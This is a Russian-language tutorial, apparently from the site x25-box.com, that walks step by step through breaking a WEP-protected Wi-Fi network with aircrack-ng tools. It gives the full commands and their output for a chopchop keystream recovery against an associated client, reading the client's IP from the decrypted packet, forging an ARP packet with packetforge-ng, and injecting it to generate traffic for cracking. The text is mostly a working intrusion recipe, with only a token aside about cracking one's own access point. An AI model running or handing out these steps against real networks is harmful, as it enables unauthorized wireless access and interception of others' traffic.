=[ x25-box.com ]=

Для начала необходимо сгенерировать xor-файл. Он даст нам возможность создавать новые шифрованные пакеты для инжекции.

Запускаем следующую команду и подбираем пакет подходящего размера. Он должен быть больше, чем ARP-пакет, который мы хотим создать, так что ищем пакеты размером 86 байт или больше. Также, было бы неплохо определить IP-адрес атакуемого клиента, поэтому следует взять пакеты с source mac или destination mac клиента – чтобы потом, используя tcpdump, извлечь IP из расшифрованного пакета.

# aireplay-ng -4 ath0 -h 00:0F:B5:46:11:19

Измените параметр –h на MAC адрес клиента, ассоциированного с AP. Также можно сделать fake association и использовать этот адрес, но проще использовать уже ассоциированный адрес.

Несмотря на то, что в этом примере взят ARP-запрос, попробуйте сами найти нужный пакет, идущий от или к рабочей станции.

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:F0:9B

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 f09b 60e3 6201 0000 55b1 496a .@.w..`.b...U.Ij
0x0020: ff2d a9ad 8161 7888 8d2d 08a7 3d10 4712 .-...ax..-..=.G.
0x0030: 1bd2 8701 8674 82b3 8746 22e3 d4d5 4e85 .....t...F"...N.
0x0040: 9911 679d b99d 4996 0c01 d7b4 6549 1840 ..g...I.....eI.@
0x0050: 0723 54fb 488d .#T.H.

Use this packet ? y

Saving chosen packet in replay_src-1231-132955.cap

Offset 85 ( 0% done) | xor = C4 | pt = 49 | 41 frames written in 124ms
Offset 84 ( 1% done) | xor = 89 | pt = C1 | 228 frames written in 684ms
Offset 83 ( 3% done) | xor = DB | pt = 20 | 129 frames written in 387ms
Offset 82 ( 5% done) | xor = 28 | pt = 7C | 245 frames written in 735ms
Offset 81 ( 7% done) | xor = 23 | pt = 00 | 5 frames written in 15ms
Offset 80 ( 9% done) | xor = 07 | pt = 00 | 30 frames written in 90ms
Offset 79 (11% done) | xor = 40 | pt = 00 | 29 frames written in 87ms
Offset 78 (13% done) | xor = 18 | pt = 00 | 6 frames written in 18ms
Offset 77 (15% done) | xor = 49 | pt = 00 | 171 frames written in 513ms

...................................

Offset 48 (71% done) | xor = EB | pt = F0 | 47 frames written in 143ms
Offset 47 (73% done) | xor = 65 | pt = 77 | 64 frames written in 190ms
Offset 46 (75% done) | xor = B3 | pt = F4 | 253 frames written in 759ms
Offset 45 (76% done) | xor = 50 | pt = 40 | 109 frames written in 327ms
Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms
Offset 43 (80% done) | xor = A6 | pt = 01 | 194 frames written in 583ms
Offset 42 (82% done) | xor = 08 | pt = 00 | 99 frames written in 296ms
Offset 41 (84% done) | xor = 29 | pt = 04 | 164 frames written in 492ms
Offset 40 (86% done) | xor = 8B | pt = 06 | 69 frames written in 207ms
Offset 39 (88% done) | xor = 88 | pt = 00 | 137 frames written in 411ms
Offset 38 (90% done) | xor = 70 | pt = 08 | 229 frames written in 687ms
Offset 37 (92% done) | xor = 60 | pt = 01 | 232 frames written in 696ms
Offset 36 (94% done) | xor = 81 | pt = 00 | 19 frames written in 57ms
Offset 35 (96% done) | xor = AB | pt = 06 | 230 frames written in 690ms

Sent 969 packets, current guess: C5...
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Warning: ICV checksum verification FAILED!
Saving plaintext in replay_dec-1231-133021.cap
Saving keystream in replay_dec-1231-133021.xor
Completed in 22s (2.18 bytes/s)

Теперь посмотрим на расшифрованный пакет tcpdump-ом или wireshark’ом, чтобы узнать IP адрес. В данном случае нам повезло и в первом же пакете попался нужный адрес атакуемого клиента. Бывает, что приходится просматривать несколько пакетов.

# tcpdump -n -vvv -e -s0 -r replay_dec-1231-133021.cap
reading from file replay_dec-1231-133021.cap, link-type IEEE802_11 (802.11)
13:30:21.150772 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:f0:9b LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.55.109 tell 192.168.55.51

Итак, теперь у нас есть IP-адрес атакуемой станции и xor-файл, который можно использовать для создания пакетов. Не забудьте включить опции –j и –o в эту команду. Если вы используете версию 0.9, правильной командой будет:

# packetforge-ng --arp -a 00:14:6C:7E:40:80 -c 00:0F:B5:46:11:19 -h 00:40:F4:77:F0:9B -j -o -l 192.168.55.109 -k 192.168.55.51 -y replay_dec-1231-133021.xor -w arpforge.cap

-a 00:14:6C:7E:40:80 MAC AP
-c 00:0F:B5:46:11:19 MAC атакуемого клиента
-h 00:40:F4:77:F0:9B MAC любой рабочей станции в сети. Если вы не знаете ни одного – можете придумать.
-l 192.168.55.109
-k 192.168.55.51
-y replay_dec-1231-133021.xor
-j ставим FromDS бит
-o очищаем ToDS бит

А эта команда корректна для версии 0.62 (там была ошибка с перепутанными параметрами –l и –k):

# packetforge-ng --arp -a 00:14:6C:7E:40:80 -c 00:0F:B5:46:11:19 -h 00:40:F4:77:F0:9B -j -o -k 192.168.55.109 -l 192.168.55.51 -y replay_dec-1231-133021.xor -w arpforge.cap

После создания пакета, можно глянуть на него tcpdump’ом.. Выглядит неплохо:

# tcpdump -n -vvv -e -s0 -r arpforge.cap
reading from file arpforge.cap, link-type IEEE802_11 (802.11)
13:32:06.523444 WEP Encrypted 258us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:f0:9b Data IV:162 Pad 0 KeyID 0

Поскольку сейчас мы ломаем свою точку (не так ли?), можно расшифровать пакет и убедиться в его правильности. Это необязательно, просто убедимся, что все делаем правильно. Расшифруем:

# airdecap-ng -e teddy -w < здесь ваш WEP ключ> arpforge.cap

Смотрим:

# tcpdump –n –r arpforge-dec.cap

Должно быть что-то вроде этого:

reading from file arpforge-dec.cap, link-type EN10MB (Ethernet)
16:44:53.673597 arp who-has 192.168.55.51 tell 192.168.55.109

Все отлично, мы знаем, что адрес нашего клиента – 192.168.55.109 и мы хотим получить arp-запрос на клиента.

Теперь инжектируем пакет:

# aireplay-ng -2 -r arpforge.cap ath0

Итак, сейчас идет генерация пакетов через беспроводного клиента и можно использовать aircrack-ng для взлома WEP точно так же, как в сценариях выше.